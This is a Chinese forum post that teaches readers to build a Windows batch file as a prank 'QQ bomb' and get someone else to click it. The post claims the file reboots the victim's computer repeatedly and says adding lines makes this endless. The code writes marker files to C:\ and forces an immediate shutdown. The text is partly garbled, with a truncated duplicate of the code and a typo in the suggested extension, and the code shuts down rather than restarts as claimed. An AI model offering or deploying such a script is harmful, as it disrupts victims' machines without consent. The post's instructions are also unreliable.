- UID
- 40930
- 精华
- 0
- 积分
- 15
- 马克
- 169
- 金币
- 13
- 在线时间
- 70 小时
- 注册时间
- 2011-8-27
- 最后登录
- 2014-3-22
1级:新兵

- 注册时间
- 2011-8-27
|
马上注册,发帖爆料或参与评论,结交更多好友,享用更多功能。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
非常简单,复制以下代码到记事本: @echo off if not exist c:\1.txt echo. c:\1.txt goto err1 if not exist c:\2.txt echo. c:\2.txt goto err1 if not exist c:\3.txt echo. c:\3.txt goto e教大家一个非常简单的bat文件使用,这里可以当成QQ炸弹用。 以下的代码,如果你让对方点击了,他的电脑会连续重启5次。if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1goto err2:err1 shutdown -s -t 0 :err2 复制完以后,保存到记事本,把记事本文件更改为 .bat后缀的文件。如果你想让对方连续重新启动,那就无限的增加下去,如在if not exist c:\5.txt echo. >c:\5.txt & goto err1后面增加ifnot exist c:\5.txt echo. >c:\6.txt & goto err1 |
|